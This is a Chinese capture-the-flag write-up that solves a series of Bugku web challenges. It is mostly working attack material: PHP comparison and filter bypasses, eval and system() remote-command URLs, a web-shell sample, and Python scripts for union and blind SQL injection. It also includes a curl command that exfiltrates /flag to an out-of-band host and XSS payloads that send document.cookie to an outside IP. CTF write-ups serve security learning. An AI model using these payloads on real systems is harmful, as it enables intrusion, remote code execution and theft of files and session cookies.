友情提示:本文最后更新于 367 天前,文中的内容可能已有所发展或发生改变。 滑稽 1
2
3
4
5
6
7
8
9
GET / HTTP / 1.1
Host : 114.67.175.224:12728
Cache-Control : max-age=0
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Connection : close
计算器 这个题有点懵逼,只能输入一位我是想抓包写脚本拿flag的,结果直接就刚好遇到一个,算对就有flag了
alert 我用Chrome一直弹窗,然后换了Firefox直接取消弹窗看源代码解码即可
你必须让他停下 抓住机会查看源代码即可
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
< html >
< head >
< meta charset = "utf-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1.0" >
< meta name = "description" content = "" >
< meta name = "author" content = "" >
< title > Dummy game</ title >
</ head >
< script language = "JavaScript" >
function myrefresh (){
window . location . reload ();
}
setTimeout ( 'myrefresh()' , 500 );
</ script >
< body >
< center >< strong > I want to play Dummy game with others£¡But I can't stop!</ strong ></ center >
< center > Stop at panda ! u will get flag</ center >
< center >< div >< img src = "10.jpg" /></ div ></ center >< br >< a style = "display:none" > flag{080fbeb5341a1bafb531fc130a74f7c1}</ a ></ body >
</ html >
头等舱 F12然后HTTP头里面有flag
GET 1
http://114.67.175.224:15269/?what=flag
POST source 查看源码发现应该是要用githack
1
2
3
4
5
6
githacker --url http://114.67.175.224:14120/.git/ --output-folder './test'
git log --reflog
git show
git reset --hard e0b8e8e2df0e08f9719df35b8cf68ab4cbd8d3b0
结果还出不来,没得到完整
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
wget -r http://114.67.175.224:14120/.git
┌──( kali㉿kali) -[ ~/桌面/114.67.175.224:14120]
└─$ git reflog
d256328 ( HEAD -> master) HEAD@{ 0} : reset: moving to d25632
13ce8d0 HEAD@{ 1} : commit: flag is here?
fdce35e HEAD@{ 2} : reset: moving to fdce35e
e0b8e8e HEAD@{ 3} : reset: moving to e0b8e
40c6d51 HEAD@{ 4} : commit: flag is here?
fdce35e HEAD@{ 5} : commit: flag is here?
d256328 ( HEAD -> master) HEAD@{ 6} : commit: flag is here?
e0b8e8e HEAD@{ 7} : commit ( initial) : this is index.html
┌──( kali㉿kali) -[ ~/桌面/114.67.175.224:14120]
└─$ git show 40c6d51
commit 40c6d51b81775a1590c1b051d9562222e41c4741
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:34:43 2021 +0800
flag is here?
diff --git a/flag.txt b/flag.txt
index aa6f6dc..726e5d1 100644
--- a/flag.txt
+++ b/flag.txt
@@ -1 +1 @@
-flag{ nonono}
+flag{ git_is_good_distributed_version_control_system}
矛盾 1
2
3
4
5
6
7
$num = $_GET [ 'num' ];
if ( ! is_numeric ( $num ))
{
echo $num ;
if ( $num == 1 )
echo 'flag{**********}' ;
}
%00截断就行
1
http://114.67.175.224:18871/?num=1%00
备份是个好习惯 扫描出来然后
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<? php
include_once "flag.php" ;
ini_set ( "display_errors" , 0 );
$str = strstr ( $_SERVER [ 'REQUEST_URI' ], '?' );
$str = substr ( $str , 1 );
$str = str_replace ( 'key' , '' , $str );
// 双写绕过
parse_str ( $str );
// 变量覆盖
echo md5 ( $key1 );
echo md5 ( $key2 );
if ( md5 ( $key1 ) == md5 ( $key2 ) && $key1 !== $key2 ){
echo $flag . "取得flag" ;
}
?>
1
http://114.67.175.224:12908/?kkeyey1=QNKCDZO&kkeyey2=s214587387a
变量1 1
2
3
4
5
6
7
8
9
10
11
12
<? php
error_reporting ( 0 );
include "flag1.php" ;
highlight_file ( __file__ );
if ( isset ( $_GET [ 'args' ])){
$args = $_GET [ 'args' ];
if ( ! preg_match ( "/^\w+$/" , $args )){
die ( "args error!" );
}
eval ( "var_dump($ $args );" );
}
?>
这里可变变量直接输出flag就好了
1
2
args=GLOBALS
$$args=$GLOBALS
本地管理员 查看源代码拿到密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST / HTTP / 1.1
Host : 114.67.175.224:11228
Content-Length : 23
Pragma : no-cache
Cache-Control : no-cache
Origin : http://114.67.175.224:11228
Content-Type : application/x-www-form-urlencoded
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer : http://114.67.175.224:11228/
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
x-forwarded-for : 127.0.0.1
Connection : close
pass=test123&user=admin
game1 查看源代码重要的就是这一部分
1
2
3
4
5
6
7
8
9
function overShowOver () {
$ ( '#modal' ). show ();
$ ( '#over-modal' ). show ();
var ppp = '180.84.29.90' ;
var sign = Base64 . encode ( score . toString ());
xmlhttp . open ( "GET" , "score.php?score=" + score + "&ip=" + ppp + "&sign=" + sign , true );
xmlhttp . send ();
$ ( '#over-zero' ). show ();
}
我们是可以任意进行覆盖分数的
1
2
3
4
5
6
7
8
9
GET /score.php?score=75&ip=180.84.29.90&sign=zMNzU=== HTTP / 1.1
Host : 114.67.175.224:13710
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : */*
Referer : http://114.67.175.224:13710/
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0
Connection : close
那这里直接覆盖就好了
1
2
3
4
5
6
7
8
9
GET /score.php?score=9999&ip=180.84.29.90&sign=zMOTk5OTk= HTTP / 1.1
Host : 114.67.175.224:13710
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : */*
Referer : http://114.67.175.224:13710/
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0
Connection : close
源代码 拿到源代码之后在控制台把结果打印出来
1
2
3
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62' ;
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b' ;
console . log ( unescape ( p1 ) + unescape ( '%35%34%61%61%32' + p2 ));
1
2
3
4
5
6
7
8
9
10
11
12
13
14
function checkSubmit () {
var a = document . getElementById ( "password" );
if ( typeof a !== "undefined" ) {
if ( "67d709b2b54aa2aa648cf6e87a7114f1" === a . value ) {
return true ; // 密码正确,允许提交
}
alert ( "Error" ); // 密码错误,显示错误提示
a . focus (); // 聚焦到密码输入框
return false ; // 阻止表单提交
}
}
document . getElementById ( "levelQuest" ). onsubmit = checkSubmit ; // 设置表单的提交事件
网站被黑 提示里面说了是后门直接访问shell.php,密码爆破即可hack
bp 爆破密码就可以了,这里不放图了
1
2
3
4
5
6
7
8
var r = { code : 'bugku10000' }
if ( r . code == 'bugku10000' ){
console . log ( 'e' );
document . getElementById ( 'd' ). innerHTML = "Wrong account or password!" ;
} else {
console . log ( '0' );
window . location . href = 'success.php?code=' + r . code ;
}
这里填进去直接复制粘贴比较好不然一直弄不出来,zxc123
好像需要密码 一样的爆破只不过这里是纯五位数字
12468
shell 1
2
3
4
5
6
7
8
9
10
<? php
$poc = "a#s#s#e#r#t" ; // 定义一个包含 # 的字符串
$poc_1 = explode ( "#" , $poc ); // 按 # 分隔字符串,得到数组
// 拼接数组中的元素,形成函数名
$poc_2 = $poc_1 [ 0 ] . $poc_1 [ 1 ] . $poc_1 [ 2 ] . $poc_1 [ 3 ] . $poc_1 [ 4 ] . $poc_1 [ 5 ];
// 调用函数,并将来自 GET 请求的参数 's' 传递给它
$poc_2 ( $_GET [ 's' ]);
?>
这里直接给了shell
1
http://114.67.175.224:14442/?s=system("cat flaga15808abee46a1d5.txt");
eval 1
2
3
4
5
6
<? php
include "flag.php" ;
$a = @ $_REQUEST [ 'hello' ];
eval ( "var_dump( $a );" );
show_source ( __FILE__ );
?>
1
http://114.67.175.224:10148/?hello=system("tac f*")
需要管理员 robots.txt得到/resusl.php
1
if ( $_GET [ x ] == $password )
1
http://114.67.175.224:19770/resusl.php?x=admin
程序员本地网站 1
2
3
4
5
6
7
8
9
10
11
12
GET / HTTP / 1.1
Host : 114.67.175.224:11563
Pragma : no-cache
Cache-Control : no-cache
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468
x-forwarded-for : 127.0.0.1
Connection : close
你从哪里来 1
2
3
4
5
6
7
8
9
10
11
12
GET / HTTP / 1.1
Host : 114.67.175.224:18705
Pragma : no-cache
Cache-Control : no-cache
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468
referer : www.google.com
Connection : close
前女友 1
2
3
4
5
6
7
8
9
10
11
12
<? php
if ( isset ( $_GET [ 'v1' ]) && isset ( $_GET [ 'v2' ]) && isset ( $_GET [ 'v3' ])){
$v1 = $_GET [ 'v1' ];
$v2 = $_GET [ 'v2' ];
$v3 = $_GET [ 'v3' ];
if ( $v1 != $v2 && md5 ( $v1 ) == md5 ( $v2 )){
if ( ! strcmp ( $v3 , $flag )){
echo $flag ;
}
}
}
?>
1
http://114.67.175.224:12414/?v1[]=1&v2[]=2&v3[]=2
这里全部用数组绕过
MD5 数组绕过不了,碰撞弱等于?
1
http://114.67.175.224:16094/?a=240610708
各种绕过哟 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<? php
highlight_file ( 'flag.php' );
$_GET [ 'id' ] = urldecode ( $_GET [ 'id' ]);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}' ;
if ( isset ( $_GET [ 'uname' ]) and isset ( $_POST [ 'passwd' ])) {
if ( $_GET [ 'uname' ] == $_POST [ 'passwd' ])
print 'passwd can not be uname.' ;
else if ( sha1 ( $_GET [ 'uname' ]) === sha1 ( $_POST [ 'passwd' ]) & ( $_GET [ 'id' ] == 'margin' ))
die ( 'Flag: ' . $flag );
else
print 'sorry!' ;
}
?>
1
2
3
http://114.67.175.224:11633/?id=%6d%61%72%67%69%6e&uname[]=1
POST:
passwd[]=2
秋名山车神 脚本题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests
import re
url = "http://114.67.175.224:18454/"
s = requests . Session ()
r = s . get ( url )
equation = re . search ( r '(\d+[+\-*])+(\d+)' , r . text ) . group ()
for i in range ( 0 , 50 ):
result = eval ( equation )
key = { 'value' : result }
response = s . post ( url = url , data = key )
print ( response . text )
if "flag" in response . text :
break
速度要快 发包得到假的flag,其中进行了两层的base64编码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP / 1.1
Host : 114.67.175.224:18292
Cache-Control : max-age=0
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468; PHPSESSID=3q824q2rr6j4ee6uubk428j9t0
Connection : close
Content-Type : application/x-www-form-urlencoded
Content-Length : 13
margin=917329
进行发包之后发现这个东西,每次都会变,那么就写个脚本吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests
import base64
url = "http://114.67.175.224:18292/"
s = requests . Session ()
for i in range ( 0 , 50 ):
r = s . get ( url )
header_flag = r . headers [ 'flag' ]
header_flag_decoded = base64 . b64decode ( header_flag )
header_flag = header_flag_decoded . decode ()
value = header_flag . split ( "flag吧: " )[ 1 ]
v = base64 . b64decode ( value )
v = v . decode ( 'utf-8' )
# print(v)
response = s . post ( url = url , data = { "margin" : v })
print ( response . text )
if "flag" in response . text :
break
print ( response . text )
file_get_contents 1
2
3
4
5
6
7
8
9
10
11
12
13
<? php
extract ( $_GET );
if ( ! empty ( $ac )) {
$f = trim ( file_get_contents ( $fn ));
if ( $ac === $f ) {
echo "<p>This is flag: $flag </p>" ;
} else {
echo "<p>sorry!</p>" ;
}
}
?>
这里直接绕过就可以了使用php://input
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?ac=1&fn=php://input HTTP / 1.1
Host : 114.67.175.224:18164
Pragma : no-cache
Cache-Control : no-cache
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468; PHPSESSID=3q824q2rr6j4ee6uubk428j9t0
Connection : close
Content-Length : 1
Content-Type : application/x-www-form-urlencoded
1
成绩查询 #注释即可
1
2
3
4
5
6
7
8
9
10
id =- 1 'union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4%23
information_schema,mysql,skctf,test
id=-1' union select 1 ,( select group_concat ( table_name ) from information_schema . tables where table_schema = 'skctf' ), 3 , 4 % 23
fl4g , sc
id =- 1 'union select 1,(select group_concat(column_name) from information_schema.columns where table_name=' fl4g '),3,4%23
skctf_flag
id=-1' union select 1 ,( select group_concat ( skctf_flag ) from fl4g ), 3 , 4 % 23
no select 万能密码
login2 1
2
3
$ sql = "SELECT username,password FROM admin WHERE username='" . $ username . "'" ;
if ( ! empty ( $ row ) && $ row [ 'password' ] === md5 ( $ password )) {
}
这里密码可控,直接写
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /login.php HTTP / 1.1
Host : 114.67.175.224:13441
Content-Length : 75
Cache-Control : max-age=0
Origin : http://114.67.175.224:13441
Content-Type : application/x-www-form-urlencoded
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer : http://114.67.175.224:13441/login.php
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03
Connection : close
username=1'+union+select+1,'c4ca4238a0b923820dcc509a6f75849b'--+&password=1
进来之后以为是命令执行,试了好久发现延时注入那么也就是无回显,直接试试外带
1
1 ; curl - X POST - F xx =@/ flag http : // s0tkq771hedhphubgxb7wvdmvd15pu . oastify . com
sql注入 慢慢测,先fuzz,发现用户名可以注入
1
2
3
4
5
6
'or(1<>1)# username does not exist!
' or ( 1 <> 2 ) # password error !
'or(length(database())>7)# password error!
' or ( length ( database ()) > 8 ) # username does not exist !
1
2
3
4
5
6
7
8
9
substr ( ‘ flag ’ from 1 ) --------------->返回:flag
substr ( ‘ flag ’ from 2 ) --------------->返回:lag
substr ( ‘ flag ’ from 3 ) --------------->返回:ag
substr ( ‘ flag ’ from 4 ) --------------->返回:g
substr (( reverse ( substr ( ‘ flag ’ form 1 ))) from 4 ) ------------->返回:f
substr (( reverse ( substr ( ‘ flag ’ form 2 ))) from 3 ) ------------->返回:l
substr (( reverse ( substr ( ‘ flag ’ form 3 ))) from 2 ) ------------->返回:a
substr (( reverse ( substr ( ‘ flag ’ form 4 ))) from 1 ) ------------->返回:g
这里直接写exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
url = 'http://114.67.175.224:18214/index.php'
database = ''
# for i in range(1, 9):
# for p in range(95, 122):
# m = 9 - i
# payload = "1'or(ord(substr(reverse(substr((database())from({})))from({})))<>{})#".format(i, m, p)
# data = {
# 'username': payload,
# 'password': '1'
# }
# res = requests.post(url=url, data=data)
# if "username does not exist!" in res.text:
# database += chr(p)
# print(database)
# break
password = ''
for i in range ( 1 , 33 ):
for p in range ( 45 , 126 ):
m = 33 - i
payload = "1'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from( {} )))from( {} )))<> {} )#" . format ( i , m , p )
data = {
'username' : payload ,
'password' : '1'
}
res = requests . post ( url = url , data = data )
if "username does not exist!" in res . text :
password += chr ( p )
print ( password )
不是我说这平台真的卡的日牛,跑这么慢
还有表名我也跑不了,哎蚌埠
都过滤了 懒得喷,跑不出来,但是看上一道题猜进去了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
url = "http://114.67.175.224:18597/login.php"
password = ""
for i in range ( 1 , 100 ):
payload1 = "admin'^(length(passwd)=" + str ( i ) + ")^'"
data = {
'uname' : payload1 ,
'passwd' : '123'
}
r = requests . post ( url = url , data = data )
if "username error!!@_@" in r . text :
print ( "密码的长度是" + str ( i ))
break
for i in range ( 1 , 33 ):
for j in '0123456789abcdefghijklmnopqrstuvwxyz' :
payload = "admin'-(ascii(mid((passwd)from(" + str ( i ) + ")))=" + str ( ord ( j )) + ")-'"
data = {
'uname' : payload ,
'passwd' : '123'
}
r = requests . post ( url = url , data = data )
#print(r.content)
if "username error!!@_@" in r . text :
password += j
print ( password )
break
print ( "密码是" + password )
login1 直接注册覆盖
留言板 先扫
没啥用不知道密码,直接打算了
1
< img src = / onerror="window.location='http:/ / ip : 9999 /? a = ' + document . cookie ; " >
长度超过了
1
< body onload = "window.open('http://156.238.233.93:9999/'+document.cookie)" >
被转义了,没有打通,看wp有这个文件,这是多少年前的吧,现在访问直接404
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# Host : localhost ( Version : 5 . 5 . 53 )
# Date : 2019 - 08 - 04 16 : 13 : 22
# Generator : MySQL - Front 5 . 3 ( Build 4 . 234 )
/*!40101 SET NAMES utf8 */ ;
#
# Structure for table "text"
#
CREATE DATABASE xss DEFAULT CHARACTER SET utf8 ;
use xss ;
DROP TABLE IF EXISTS ` text ` ;
CREATE TABLE ` text ` (
` Id ` int ( 11 ) NOT NULL AUTO_INCREMENT ,
` text ` varchar ( 255 ) DEFAULT NULL ,
PRIMARY KEY ( ` Id ` )
) ENGINE = MyISAM DEFAULT CHARSET = utf8 ;
#
# Data for table "text"
#
/*!40000 ALTER TABLE `text` DISABLE KEYS */ ;
/*!40000 ALTER TABLE `text` ENABLE KEYS */ ;
#
# Structure for table "user"
#
DROP TABLE IF EXISTS ` user ` ;
CREATE TABLE ` user ` (
` Id ` int ( 11 ) NOT NULL AUTO_INCREMENT ,
` username ` varchar ( 255 ) DEFAULT NULL ,
` password ` varchar ( 255 ) DEFAULT NULL ,
PRIMARY KEY ( ` Id ` )
) ENGINE = MyISAM DEFAULT CHARSET = utf8 ;
#
# Data for table "user"
#
/*!40000 ALTER TABLE `user` DISABLE KEYS */ ;
INSERT INTO ` user ` VALUES ( 1 , 'admin' , '011be4d65feac1a8' );
/*!40000 ALTER TABLE `user` ENABLE KEYS */ ;
登录之后又弹窗
1
< script > alert ( document . cookie ) < /script>
留言板1 现在的平台已经用不了了emm难绷
文件包含 1
http://114.67.175.224:18683/index.php?file=/flag
cookies 1
http://114.67.175.224:14505/index.php?line=&filename=L2ZsYWc=
然后cookie里面有flag
never_give_up 源码里面1p.html
1
2
3
4
5
6
7
8
var Words = "%3Cscript%3Ewindow.location.href%3D'http%3A%2F%2Fwww.bugku.com'%3B%3C%2Fscript%3E%20%0A%3C!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF--%3E"
function OutWord ()
{
var NewWords ;
NewWords = unescape ( Words );
document . write ( NewWords );
}
OutWord ();
这里解码base64再url解码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
";if(! $_GET['id'] )
{
header('Location: hello.php?id=1');
exit();
}
$id = $_GET['id'] ;
$a = $_GET['a'] ;
$b = $_GET['b'] ;
if(stripos( $a ,'.'))
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents( $a ,'r');
if( $data ==" bugku is a nice plateform ! " and $id ==0 and strlen( $b )>5 and eregi(" 111 ".substr( $b ,0,1)," 1114 ") and substr( $b ,0,1)!=4)
{
$flag = " flag { *********** } "
}
else
{
print " never never never give up !!! ";
}
?>
绕过file_get_contents昨天还做了的b的话用通配符就可以绕过了
ereg() 函数或 eregi() 函数存在空字符截断漏洞,即参数中的正则表达式或待匹配字符串遇到空字符则截断丢弃后面的数据。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /hello.php?id=0a&a=php://input&b=?12345 HTTP / 1.1
Host : 114.67.175.224:17120
Cache-Control : max-age=0
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D
Connection : close
Content-Type : application/x-www-form-urlencoded
Content-Length : 26
bugku+is+a+nice+plateform!
1
http://114.67.175.224:17120/hello.php?id=0b&a=data://text/plain,bugku is a nice plateform!&b=?12345
文件包含2 1
http://114.67.175.224:16529/index.php?file=/flag
ezbypass 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<? php
error_reporting ( 0 );
highlight_file ( __FILE__ );
if ( isset ( $_POST [ 'code' ])) {
$code = $_POST [ 'code' ];
if ( strlen ( $code ) <= 105 ){
if ( is_string ( $code )) {
if ( ! preg_match ( "/[a-zA-Z0-9@#%^&*:{}\-<\?> \" |`~ \\\\ ]/" , $code )){
eval ( $code );
} else {
echo "Hacked!" ;
}
} else {
echo "You need to pass in a string" ;
}
} else {
echo "long?" ;
}
}
无字母参数RCE
1
2
3
4
5
6
7
8
9
10
11
<? php
$_ = ( _ / _ . _ )[ _ ];
$_ ++ ;
$__ = $_ . $_ ++ ;
$_ ++ ; $_ ++ ; $_ ++ ;
$__ = $__ . $_ ;
$_ ++ ;
$__ = $__ . $_ ;
$_ = _ . $__ ;
var_dump ( $_ );
// _POST
最后是
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST / HTTP / 1.1
Host : 114.67.175.224:18715
Content-Length : 245
Pragma : no-cache
Cache-Control : no-cache
Origin : http://114.67.175.224:18715
Content-Type : application/x-www-form-urlencoded
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
